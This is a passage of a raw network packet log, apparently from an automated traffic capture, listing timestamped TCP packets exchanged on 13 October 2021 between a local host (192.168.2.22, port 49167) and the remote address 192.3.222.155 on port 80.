                                Oct 13, 2021 17:05:26.459794044 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.459804058 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.459849119 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.459903002 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.459916115 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.459923983 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.459928036 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.459959984 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.459978104 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.460019112 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.460035086 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.460073948 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.460089922 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.460129976 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.460148096 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.460190058 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.460205078 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.460247040 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.460264921 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.460308075 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.460338116 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.460367918 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.460385084 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.460424900 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.460444927 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.460483074 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.460485935 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.460541010 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.460556984 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.460597992 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.460603952 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.460647106 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.460664034 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.460686922 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.460750103 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.460767984 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.460777998 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.460812092 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.460870981 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.460932970 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.460978031 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.460968018 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.461026907 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.461076975 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.461113930 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.461153030 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.461189985 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.461225033 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.461261988 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.461292982 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.461297989 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.461344957 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.461385965 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.461421967 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.461458921 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.461497068 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.461534023 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.461570978 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.461534977 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.461606979 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.461653948 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.461694956 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.461730957 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.461769104 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.461806059 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.461827993 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.461850882 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.461855888 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.461864948 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.461875916 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.461884975 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.461894989 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.461899996 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.461905003 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.461910009 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.461914062 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.461918116 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.461921930 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.461926937 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.461931944 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.461955070 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.461961031 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.461965084 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.461970091 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.461975098 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.461980104 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.461983919 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.461987972 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.462312937 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.462344885 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.462395906 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.462420940 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.462462902 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.462497950 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.462562084 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.462565899 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.462625980 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.462626934 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.462688923 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.462691069 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.462749004 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.469518900 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.470114946 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.630456924 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.630505085 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.630542040 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.630575895 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.630619049 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.630657911 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.630692005 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.630692959 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.630728960 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.630745888 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.630755901 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.630784035 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.630820036 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.630831957 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.630841017 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.630856037 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.630871058 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.630891085 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.630908012 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.630933046 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.630945921 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.630973101 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.630976915 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.631016016 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.631026030 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.631050110 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.631052971 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.631081104 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.631084919 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.631176949 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.631194115 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.631228924 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.631243944 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.631272078 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.631273985 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.631311893 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.631318092 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.631345987 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.631347895 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.631376982 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.631381035 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.631416082 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.631426096 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.631448984 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.631458044 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.631484032 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.631489038 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.631515026 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.631516933 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.631558895 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.631561041 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.631598949 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.631604910 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.631633043 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.631637096 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.631669998 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.631681919 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.631711006 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.633713007 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.636017084 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.636087894 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.636110067 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.636126995 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.636136055 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.636166096 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.636171103 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.636209965 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.636244059 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.636250973 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.636260986 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.636300087 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.636305094 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.636336088 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.636337996 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.636373997 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.636384010 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.636411905 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.636414051 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.636450052 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.636460066 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.636488914 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.636496067 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.636538982 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.636542082 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.636569977 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.636575937 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.636614084 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.808130980 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.808152914 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.808166981 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.808185101 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.808203936 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.808217049 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.808242083 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.808248043 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.808279991 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.808305025 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.808332920 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.814507961 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.814558983 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.814598083 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.814599037 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.814621925 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.814635038 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.814657927 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.814677000 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.814709902 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.814726114 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.814742088 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.814769030 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.814786911 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.814806938 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.814821959 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.814843893 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.814847946 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.814905882 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.814954996 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.814980030 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.814996004 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.815016985 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.815025091 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.815052032 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.815059900 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.815124035 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.815139055 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.815212965 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.815215111 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.815274000 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.815319061 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.815330982 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.815340996 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.815390110 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.815395117 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.815444946 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.815455914 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.815502882 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.815505981 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.815566063 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.815578938 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.815623999 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.815640926 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.815685034 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.815690041 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.815740108 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.815754890 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.815795898 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.815817118 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.815850973 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.815864086 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.815891027 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.815918922 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.815928936 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.815963030 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.815967083 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.815983057 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.816004992 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.816035986 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.816051006 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.816080093 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.816099882 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.816133022 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.816143990 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.816159964 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.816186905 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.816225052 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.816226959 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.816232920 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.816262960 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.816301107 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.816303015 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.816323042 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.816338062 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.816359997 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.816385031 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.816401005 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.816426992 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.816458941 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.816463947 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.816482067 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.816502094 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.816523075 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.816539049 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.816546917 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.816575050 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.816612005 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.816612005 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.816629887 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.816649914 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.816684008 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.816698074 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.816703081 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.816740036 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.816766977 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.816776991 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.816798925 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.816813946 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.816828012 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.816853046 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.816881895 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.816889048 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.816905022 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.816927910 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.816946030 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.816966057 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.816999912 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817013025 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817018986 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817054987 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817070961 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817091942 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817106962 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817128897 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817158937 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817167044 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817181110 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817203045 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817219973 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817240953 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817248106 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817286968 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817308903 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817320108 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817348957 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817357063 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817373037 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817382097 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817399025 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817408085 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817425966 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817451954 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817451954 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817467928 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817476988 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817481995 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817502975 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817516088 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817534924 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817548037 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817564964 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817565918 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817590952 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817600012 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817616940 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817625046 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817642927 CEST8049167192.3.222.155192.168.2.22
